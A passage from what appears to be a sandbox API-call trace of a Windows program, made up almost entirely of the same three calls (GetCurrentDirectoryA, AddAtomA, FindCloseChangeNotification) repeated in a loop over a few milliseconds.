lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.790] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.790] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.790] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.791] AddAtomA (lpString=0x0) returned 0x0 [0043.791] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.791] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.792] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.792] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.792] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.793] AddAtomA (lpString=0x0) returned 0x0 [0043.793] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.793] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.794] AddAtomA (lpString=0x0) returned 0x0 [0043.794] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.794] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.795] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.795] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.795] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.795] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.795] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.795] AddAtomA (lpString=0x0) returned 0x0 [0043.795] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.808] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.808] AddAtomA (lpString=0x0) returned 0x0 [0043.808] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.809] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.809] AddAtomA (lpString=0x0) returned 0x0 [0043.809] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.810] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.810] AddAtomA (lpString=0x0) returned 0x0 [0043.810] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.810] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.810] AddAtomA (lpString=0x0) returned 0x0 [0043.810] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.813] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.813] AddAtomA (lpString=0x0) returned 0x0 [0043.813] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.814] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.814] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.814] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0043.815] AddAtomA (lpString=0x0) returned 0x0 [0043.815] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0043.815] GetCurrentDirectoryA (in: nBufferLength=0x0, 